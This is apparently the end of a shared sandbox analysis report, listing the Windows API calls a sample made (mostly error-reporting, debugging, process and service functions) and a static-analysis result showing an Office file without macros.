- "vmictimeprovider.dll.TimeProvCommand",
- "vmictimeprovider.dll.TimeProvOpen",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventEnabled",
- "advapi32.dll.EventWrite",
- "ws2_32.dll.WSAAddressToStringW",
- "ws2_32.dll.#3",
- "ws2_32.dll.#116",
- "advapi32.dll.EventUnregister",
- "sspicli.dll.LsaUnregisterPolicyChangeNotification",
- "userenv.dll.UnregisterGPNotification",
- "gpapi.dll.UnregisterGPNotificationInternal",
- "wersvc.dll.ServiceMain",
- "wersvc.dll.SvchostPushServiceGlobals",
- "faultrep.dll.WerpInitiateCrashReporting",
- "wer.dll.WerpCreateMachineStore",
- "shell32.dll.SHGetFolderPathEx",
- "userenv.dll.CreateEnvironmentBlock",
- "sspicli.dll.GetUserNameExW",
- "userenv.dll.DestroyEnvironmentBlock",
- "wer.dll.WerpSvcReportFromMachineQueue",
- "advapi32.dll.DuplicateToken",
- "wtsapi32.dll.WTSQueryUserToken",
- "winsta.dll.WinStationQueryInformationW",
- "advapi32.dll.CreateWellKnownSid",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall3",
- "advapi32.dll.ImpersonateLoggedOnUser",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.RevertToSelf",
- "imm32.dll.ImmDisableIME",
- "wer.dll.WerpCreateIntegratorReportId",
- "wer.dll.WerReportCreate",
- "wer.dll.WerpSetIntegratorReportId",
- "wer.dll.WerReportSetParameter",
- "dbgeng.dll.DebugCreate",
- "ntdll.dll.CsrGetProcessId",
- "ntdll.dll.DbgBreakPoint",
- "ntdll.dll.DbgPrint",
- "ntdll.dll.DbgPrompt",
- "ntdll.dll.DbgUiConvertStateChangeStructure",
- "ntdll.dll.DbgUiGetThreadDebugObject",
- "ntdll.dll.DbgUiIssueRemoteBreakin",
- "ntdll.dll.DbgUiSetThreadDebugObject",
- "ntdll.dll.NtAllocateVirtualMemory",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtCreateDebugObject",
- "ntdll.dll.NtCreateFile",
- "ntdll.dll.NtDebugActiveProcess",
- "ntdll.dll.NtDebugContinue",
- "ntdll.dll.NtFreeVirtualMemory",
- "ntdll.dll.NtOpenProcess",
- "ntdll.dll.NtOpenThread",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQueryInformationThread",
- "ntdll.dll.NtQueryMutant",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.NtRemoveProcessDebug",
- "ntdll.dll.NtResumeThread",
- "ntdll.dll.NtSetInformationDebugObject",
- "ntdll.dll.NtSetInformationProcess",
- "ntdll.dll.NtSystemDebugControl",
- "ntdll.dll.NtWaitForDebugEvent",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlCreateProcessParameters",
- "ntdll.dll.RtlCreateUserProcess",
- "ntdll.dll.RtlDestroyProcessParameters",
- "ntdll.dll.RtlDosPathNameToNtPathName_U",
- "ntdll.dll.RtlFindMessage",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlGetFunctionTableListHead",
- "ntdll.dll.RtlGetUnloadEventTrace",
- "ntdll.dll.RtlGetUnloadEventTraceEx",
- "ntdll.dll.RtlInitAnsiString",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlTryEnterCriticalSection",
- "ntdll.dll.RtlUnicodeStringToAnsiString",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.NtQueryInformationToken",
- "kernel32.dll.CloseProfileUserMapping",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.DebugBreakProcess",
- "kernel32.dll.DebugSetProcessKillOnExit",
- "kernel32.dll.Module32First",
- "kernel32.dll.Module32FirstW",
- "kernel32.dll.Module32Next",
- "kernel32.dll.Module32NextW",
- "kernel32.dll.OpenThread",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32Next",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SetProcessShutdownParameters",
- "kernel32.dll.Thread32First",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.Wow64GetThreadSelectorEntry",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.ControlService",
- "advapi32.dll.CreateServiceA",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.DeleteService",
- "advapi32.dll.EnumServicesStatusExA",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.GetEventLogInformation",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.OpenServiceA",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.StartServiceA",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.GetSidSubAuthorityCount",
- "version.dll.GetFileVersionInfoSizeExW",
- "version.dll.GetFileVersionInfoExW",
- "dbghelp.dll.WinDbgExtensionDllInit",
- "dbghelp.dll.ExtensionApiVersion",
- "wer.dll.WerpSetDynamicParameter",
- "wer.dll.WerReportAddDump",
- "wer.dll.WerpSetCallBack",
- "wer.dll.WerReportSetUIOption",
- "wer.dll.WerpAddRegisteredDataToReport",
- "wer.dll.WerReportSubmit",
- "user32.dll.LoadStringW",
- "advapi32.dll.RegCreateKeyExW",
- "sensapi.dll.IsNetworkAlive",
- "user32.dll.CharUpperW",
- "wer.dll.WerpAddAppCompatData",
- "apphelp.dll.SdbGetFileAttributes",
- "apphelp.dll.SdbFormatAttribute",
- "apphelp.dll.SdbFreeFileAttributes",
- "dbghelp.dll.MiniDumpWriteDump",
- "kernel32.dll.GetLongPathNameA",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetProcessTimes",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegQueryValueExA",
- "powrprof.dll.CallNtPowerInformation",
- "version.dll.GetFileVersionInfoSizeA",
- "version.dll.GetFileVersionInfoA",
- "version.dll.VerQueryValueA",
- "verifier.dll.VerifierEnumerateResource",
- "ntdll.dll.NtSuspendProcess",
- "ntdll.dll.NtResumeProcess",
- "advapi32.dll.QueryTraceW",
- "advapi32.dll.IsValidSid",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.CopySid",
- "advapi32.dll.AddAccessAllowedAceEx",
- "wer.dll.WerpGetStoreLocation",
- "wer.dll.WerpGetStoreType",
- "wer.dll.WerReportCloseHandle",
- "user32.dll.MsgWaitForMultipleObjects",
- "wer.dll.WerpFreeString",
- "user32.dll.GetProcessWindowStation",
- "user32.dll.GetThreadDesktop",
- "user32.dll.GetUserObjectInformationW",
- "werui.dll.WerUICreate",
- "werui.dll.WerUIStart",
- "werui.dll.WerUITerminate",
- "werui.dll.WerUIDelete"
- ]
- [*] Static Analysis: {
- "office": {
- "Metadata": {
- "HasMacros": "No"
- }
- }
- }
Add Comment
Please, Sign In to add comment